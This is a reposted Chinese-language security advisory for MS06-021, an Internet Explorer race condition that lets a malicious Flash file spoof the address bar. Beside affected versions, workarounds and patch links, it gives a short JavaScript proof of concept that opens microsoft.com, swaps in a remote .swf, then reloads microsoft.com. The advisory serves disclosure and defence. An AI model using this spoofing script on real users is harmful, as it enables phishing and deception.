Internet Explorer窗口加载竞争条件地址栏欺骗漏…

2008-04-09 04:14:41来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Internet Explorer窗口加载竞争条件地址栏欺骗漏洞(MS06-021)

发布日期:2006-04-04
更新日期:2006-06-13

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0 SP4
描述:
BUGTRAQ ID: 17404
CVE(CAN) ID: CVE-2006-1626

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

IE在浏览器窗口中加载web内容和Macromedia Flash格式文件(.swf)时存在竞争条件漏洞,攻击者可以利用这个漏洞在显示恶意站点Flash文件的浏览器窗口中欺骗地址栏,导致网络钓鱼类的攻击。

注意:由于可以在浏览器窗口中看到恶意Flash文件的URL,因此攻击的影响会有所减缓。

<*来源:Hai Nam Luke (hainamluke@yahoo.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114408940420872&w=2
http://secunia.com/advisories/19521/print/
http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##### LukesTest.htm #####
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;

do { var curDate = new Date(); }
while(curDate-date < ms);
}

function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.buctuong.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')

}
</script>
<a href="javascript: spoof()">Perform the test</a>
#########################

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 配置Internet Explorer在运行活动脚本之前要求提示,或在Internet和本地intranet安全区中禁用活动脚本。
* 将Internet和本地intranet安全区设置为“高”以在运行ActiveX控件和活动脚本之前要求提示。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-021)以及相应补丁:
MS06-021:Cumulative Security Update for Internet Explorer (916281)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Word畸形对象指针内存破坏漏洞(MS06-027)

下一篇:Vixie Cron PAM_Limits本地权限提升漏洞